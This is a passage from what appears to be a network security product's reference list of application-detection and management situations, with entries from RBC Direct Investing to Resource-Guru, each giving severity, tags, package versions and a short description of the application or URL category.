Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RBC Direct Investing provides tools, information and learning resources to manage investments.
Back to top

RCM-Technologies

About this situation: Application RCM-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RCM Technologies is a provider of business and technology solutions designed to enhance and maximize the operational performance of its customers through the adaptation and deployment of advanced information technology and engineering services.
Back to top

Rdio

About this situation: Application Rdio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rdio is the groundbreaking digital music service that is reinventing the way people discover, listen to, and share music.
Back to top

Rdm

About this situation: RDM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: RDM+ allows you to remotely access your desktop or laptop computer from a mobile phone or PDA. Source: rdmplus
Back to top

Ready-Pro

About this situation: Application Ready-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ready Pro offers solutions, that helps companies to provide invoicing, accounting and stock control management, e-commerce integration and automatic eBay auctions listing.
Back to top

ReadyPortal

About this situation: Application ReadyPortal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Readyportal is a Web Application and Portal platform for the rapid creation and deployment of web and mobile enabled applications and portal solutions.
Back to top

ReadyTalk

About this situation: ReadyTalk traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-759-5211
Description: ReadyTalk is an online audio, video and web conferencing website. The application relies on a web based technology.
Back to top

Real Estate

About this situation: Sites that provide information about renting, buying, selling or financing residential real estate.
Context: URL Application Context
Severity: 1
Tags: Shopping, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about renting, buying, selling or financing residential real estate.
Back to top

Real-Cloud

About this situation: Application Real-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Real Cloud provides a cloud storage service provided by Real Player.
Back to top

Real-Games.com

About this situation: REAL GAMES.COM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: The site provides educational games for children.
Back to top

Realex-Payments

About this situation: Application Realex-Payments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Realex Payments is a payment gateway, providing payment processing services for businesses selling and processing payments.
Back to top

Really-Simple-Systems

About this situation: Really Simple Systems usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Realore-Studios

About this situation: Realore Studios usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

RealPage

About this situation: Application RealPage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RealPage develops on-demand multifamily property management software for the apartment communities.
Back to top

RealTime-360

About this situation: Application RealTime-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RealTime Performance solutions enable customers to accelerate leadership development, increase employee engagement, and grow the talent necessary to achieve business success.
Back to top

RealtimeBoard

About this situation: Application RealtimeBoard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RealtimeBoard is an online collaboration software created as a team collaboration and online brainstorming tool.
Back to top

REALTOR.org

About this situation: Application REALTOR.org detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NAR is trade organization
Back to top

Realtors-Property-Resource

About this situation: Application Realtors-Property-Resource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Realtors Property Resource
Back to top

Realtunnel

About this situation: realtunnel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: An anonymizing proxy service
Back to top

Realtylog

About this situation: RealtyLog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: RealtyLog provides real estate agents with a monthly subscription service to manage their entire back office and administrative desk. The app is exclusively built for agents situated in United States and Canada. The app provides features to manage and share online contracts and deals, documents and faxes, and showings and appointments.
Back to top

Reamaze-Cloud-Helpdesk

About this situation: Application Reamaze-Cloud-Helpdesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reamaze is a cloud helpdesk app designed from the ground up to fit the specific needs of agile businesses looking for a customer support solution that breaks the mold.
Back to top

Rebel

About this situation: Application Rebel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rebel is a domain registration provider.
Back to top

RebelMouse

About this situation: Application RebelMouse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RebelMouse is a social media aggregator platform. The platform allows users to aggregate their social sharing, write posts, and offers analytics to see how their content is being shared and consumed.
Back to top

ReCaptcha

About this situation: ReCaptcha usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1769-5242
Description: Google reCAPTCHA service usage has been detected.
Back to top

Recapture

About this situation: Application Recapture detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Recapture provides solutions to convert abandoning customers into paying customers in Magento store.
Back to top

Receiptful

About this situation: Application Receiptful detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Receiptful is an API that lets to send e-mail receipts through the usage of targeted, marketing messages up-sells.
Back to top

Recommind

About this situation: Application Recommind detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Recommind provide unstructured data management, analysis and governance technology, delivering search-powered business applications that transform the way organizations find, manage, analyze and act upon data inside and outside the corporate network.
Back to top

Recruitee

About this situation: Application Recruitee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Recruitee is a hiring platform for your whole team. It integrates four products into one
Back to top

Recruiterbox

About this situation: Recruiterbox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Recruiterbox is an online software that helps companies receive and manage job applications. Recruiterbox is the way to track applicants at one place with online recruiting and resume management software, applicant tracking systems.
Back to top

RecruitLoop

About this situation: Application RecruitLoop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RecruitLoop is a new model of online recruitment, with expert recruiters paid by the hour. Employers get stress-free recruitment at 80 percent lower cost.
Back to top

Recurly

About this situation: Recurly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Recurly is a software as a service company founded in September, 2009 that provides recurring billing management as an outsourced service.
Back to top

Red-Bull-TV

About this situation: Red Bull TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-755-5211
Description: Red Bull TV is a sports video distribution service.
Back to top

Red-Hat

About this situation: Application Red-Hat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Red Hat is a software company that provides open-source software products to the enterprise community.
Back to top

Red-Rocket

About this situation: Application Red-Rocket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Red Digital Cinema Camera Company is an American manufacturer of digital cinematography tools. The company primarily produces digital cinema video cameras but has also announced plans to produce a digital cinema projector and a movie distribution network.
Back to top

Redbooth

About this situation: Redbooth usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform that provides users a single place for shared tasks, discussions, file sharing, group chat, and HD video conferencing. Source: Wikipedia
Back to top

RedCritter

About this situation: Application RedCritter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RedCritter offers business solution software that enables enterprises to manage, showcase employee achievements.
Back to top

Reddit

About this situation: Reddit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1151-5242
Description: Reddit is a popular social news and entertainment content aggregator.
Back to top

Rediff.com

About this situation: Application Rediff.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rediff.com is a news media and online marketplace, focusing on providing business and consumer offerings.
Back to top

Redit2

About this situation: Application Redit2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redi2 Technologies is a provider of fee billing software to the global financial services industry, including institutional asset management, managed accounts, private wealth, mutual funds, custody and alternative investment firms as well as third party outsource providers.
Back to top

Redknee

About this situation: Application Redknee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redknee is provider of software products, solutions and services. Redknee solutions enable service providers to monetize new services, business models and content and to deliver a connected customer experience - through either SaaS or on-premise based solutions.
Back to top

RedMap

About this situation: Application RedMap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redmap is a social network service for those who are planning an exciting trip or have already returned and are eager to share their adventure.
Back to top

Redmine

About this situation: Application Redmine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redmine is a flexible project management web application. Written using the Ruby on Rails framework, it is cross-platform and cross-database.
Back to top

Redtail-CRM

About this situation: Application Redtail-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redtail CRM provide managed services platform for collaboration. This advanced platform integrates seamlessly with middle-market ERP systems from Microsoft, Sage and AccountMate. Through RedTails managed services platform, suppliers can connect and trade with their key customers, as well as third-party logistics providers in warehousing and transportation.
Back to top

Redtail-Imaging

About this situation: Application Redtail-Imaging detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redtail Imaging provides financial pros with a powerful option for managing and archiving documents from any computer, for a secure, on-demand.
Back to top

Redtailsolutions

About this situation: Application Redtailsolutions detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RedTail Solutions delivery manager Electronic Data Interchange
Back to top

Redtube

About this situation: Redtube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-628-5211
Description: Redtube is an adult video streaming service.
Back to top

Redworldwide

About this situation: Application Redworldwide detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Redworldwide used to test the proper operation of the Apache HTTP server after it has been installed.
Back to top

Reed.co.uk

About this situation: Application Reed.co.uk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reed offers training and HR consultancy services.
Back to top

Reeleezee

About this situation: Application Reeleezee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reeleezee helps business orient to needs of the user. It helps entrepreneurs and accounting firms digitize their business processes.
Back to top

Reference Materials

About this situation: Sites that offer reference-shelf content such as atlases, dictionaries, encyclopedias, formularies, white and yellow pages, and public statistical data.
Context: URL Application Context
Severity: 1
Tags: Education, Business Usage, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer reference-shelf content such as atlases, dictionaries, encyclopedias, formularies, white and yellow pages, and public statistical data.
Back to top

Referral-EDGE

About this situation: Application Referral-EDGE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Referral deliver high-end programmes to BNI members and the general business public who wished to grow their referral education and revenue streams from referrals.
Back to top

ReferralCandy

About this situation: Application ReferralCandy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ReferralCandy is a configurable refer-a-friend program that uses email marketing to encourage your customers to tell their friends about your online store.
Back to top

Refersion

About this situation: Application Refersion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Start helps to start affiliate program for shop. It helps to track partners, salespeople, and customer referrals.
Back to top

Reflex-Appointment

About this situation: Application Reflex-Appointment detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reflex specializes in software for making bookings, appointments and reservations. The software is the vital link between customer and business, between online and offline.
Back to top

Refresh policy for Internal Gateway to trust new VPN Certificate Authority

About this situation: Refresh policy for Internal Gateway to trust new VPN Certificate Authority
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: Refresh the policy on Firewall that is used as an Internal Gateway that trusts VPN Certificate Authority 'Internal IPsec CA', so that the Internal Gateway receives the new VPN Certificate Authority information.
Back to top

Register.com

About this situation: Application Register.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Register.com provides a resources reserved for organizations
Back to top

Register4less

About this situation: Application Register4less detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Register4Less.com is a domain registration and web hosting company.
Back to top

Registro.br

About this situation: Application Registro.br detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Registro.br domain registration service.
Back to top

Regnum

About this situation: Regnum usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This website hosts a massively multi-player online role-playing game (MMORPG). Source: Wikipedia
Back to top

RegOnline

About this situation: Application RegOnline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RegOnline is a software company that provides online registration and attendee management solutions.
Back to top

Regression-Prediction

About this situation: Application Regression-Prediction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prediction regression performs multiple linear regression analysis on large sets of variables to identify casual and influential relationships. Statistical tests are explained in simple text for fast interpretation and utilization for predictive analysis and forecasting. The identified and statistically robust prediction equation can be automatically applied to variable data to produce predictions and forecasts.
Back to top

Regsvr32

About this situation: Endpoint Context Agent based Regsvr32.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: A network connection launched by the Windows system process Regsvr32.exe was detected. Regsvr32.exe is used for registering and unregistering OLE controls.
Back to top

Reid-Supply

About this situation: Application Reid-Supply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Essentra Components
Back to top

Relenta

About this situation: Relenta usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

ReliaBills

About this situation: Application ReliaBills detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ReliaBills automates invoicing, recurring billing, and offer more payment options so you can get paid faster.
Back to top

Reliable-Runners

About this situation: Application Reliable-Runners detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RRunners provides expedited delivery services, fleet outsourcing solutions, warehousing and distribution services, fulfillment services, scheduled delivery services.
Back to top

Reliance-Big-Rock

About this situation: Application Reliance-Big-Rock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Big Rock Domain names web hosting company offers domain name registration, web hosting, web design and website builder tools.
Back to top

Religion

About this situation: The parent category that contains the categories: Non-Traditional Religion and Traditional Religions.
Context: URL Application Context
Severity: 1
Tags: Religion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the categories: Non-Traditional Religion and Traditional Religions.
Back to top

Remarkety

About this situation: Application Remarkety detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Remarkety - Email Remarketing Automation for E-commerce. Increase sales from customers by sending automated emails based on customers behavior and purchase history.
Back to top

Remember-The-Milk

About this situation: Application Remember-The-Milk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Remember the Milk
Back to top

Remote Desktop Connection

About this situation: Endpoint Context Agent based Remote Desktop Connection
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Remote Desktop Connection endpoint application has been detected.
Back to top

RemoteCall

About this situation: Application RemoteCall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RemoteCall is the platform that helps communicate with the customer.
Back to top

RemotePC

About this situation: Application RemotePC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RemotePC allow connect to your work
Back to top

RemoteUtilities

About this situation: Application RemoteUtilities detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RemoteUtilities - remote desktop software for LAN and Internet. Remotely access your PC from anywhere.
Back to top

Remoteview

About this situation: RemoteView usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application allows users to control a PC through a web-based connection on a separate PC or mobile device.
Back to top

Remotia

About this situation: Application Remotia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Remotia's web-based Accounting module is a platform that provides built-in templates to help users and companies manage financial details.
Back to top

Remotia-CRM

About this situation: Remotia CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Remsh.exe

About this situation: Endpoint Context Agent based Remsh.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: A network connection launched by the Windows system process Remsh.exe was detected. Remsh.exe is a file which is used by some builds of Windows 10 Versions 1507, 1511, and 1607. It is required by these builds to reliably perform the Windows update process.
Back to top

Renaissance-Institutional

About this situation: Application Renaissance-Institutional detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Renaissance Technologies LLC is an investment management company dedicated to producing superior returns for its clients, provides services to pooled investment vehicles. It also provides its services to banking or thrift institutions and corporations.
Back to top

Renaissance-Learning

About this situation: Application Renaissance-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Renaissance Learning provide cloud-based assessment, teaching, and learning solutions.
Back to top

Renren

About this situation: Renren usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-628-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to networking with each other via photos, blogs, book and movie review, instant messaging, mail etc.
Back to top

Renren-Apps

About this situation: Renren Apps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-630-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to network with each other via photos, blogs, book and movie reviews, instant messaging, mail etc.
Back to top

Renren-Instant-Messaging

About this situation: Renren instant messaging detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-628-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to networking with each other via photos, blogs, book and movie review, instant messaging, mail etc. This application covers the Renren instant messaging events such as user authentication and initiating a chat stream.
Back to top

Renren-Mail

About this situation: Renren mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-630-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to network with each other via photos, blogs, book and movie reviews, instant messaging, mail etc.
Back to top

Renren-Music

About this situation: Renren Music usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-630-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to network with each other via photos, blogs, book and movie reviews, instant messaging, mail etc.
Back to top

Renren-Posting

About this situation: Renren blog posting detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-630-5211
Description: Renren (www.renren.com) is a social networking site targeting Chinese-speaking population. The site provides ways for users to network with each other via photos, blogs, book and movie reviews, instant messaging, mail etc.
Back to top

RenWeb

About this situation: Application RenWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RenWeb is an integrated Web-based solution to a handful of private schools, and has grown to become an industry-leader in Internet-based school management systems.
Back to top

Replicon

About this situation: Application Replicon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Replicon is the provider of time asset management solutions. It offers time and attendance, time off, project and client billing, expense management and scheduling management applications.
Back to top

reQall

About this situation: Application reQall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: reQall is a global, venture-backed business focusing on context-aware, intelligent assistants.
Back to top

Requirementone

About this situation: Application Requirementone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Requirementone provide a solutions for any team or business that manages complex requirements, provide everything you need in one place
Back to top

RERUN

About this situation: Application RERUN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rerun offers to automate recurring, subscription or membership billing.
Back to top

RES-Software

About this situation: Application RES-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RES Software transforms the consumption and delivery of IT services through secure and automated IT service delivery.
Back to top

Rescuetime

About this situation: Rescuetime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-769-5211
Description: Rescuetime is a time tracking software.
Back to top

Researchgate

About this situation: ResearchGate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: ResearchGate is a social networking site for scientists and researchers to share papers, ask and answer questions, and find collaborators.
Back to top

ResellerRatings

About this situation: Application ResellerRatings detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ResellerRatings allow compare prices and read store reviews by real customers, compare products.
Back to top

Reservio

About this situation: Application Reservio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Reservio is an Online booking and appointment scheduling software, which allows easy booking management and 24
Back to top

Resfly

About this situation: Application Resfly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Resfly is a web-based job publishing service which allows hiring professionals to easily post a job to multiple leading job boards and social networks.
Back to top

Resource-Group

About this situation: Application Resource-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Resource Group offers aviation, aerospace, rail and defence resourcing solutions supporting OEM's, operators and support businesses.
Back to top

Resource-Guru

About this situation: Application Resource-Guru detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Resource Guru is a cloud-based team calendar. Resource Guru is the way to schedule people, equipment, and other resources online
Back to top

Resources consumption is safe.

About this situation: Heavy resources consumption back to a safe level
Context: Other SMC situations
Severity: 6
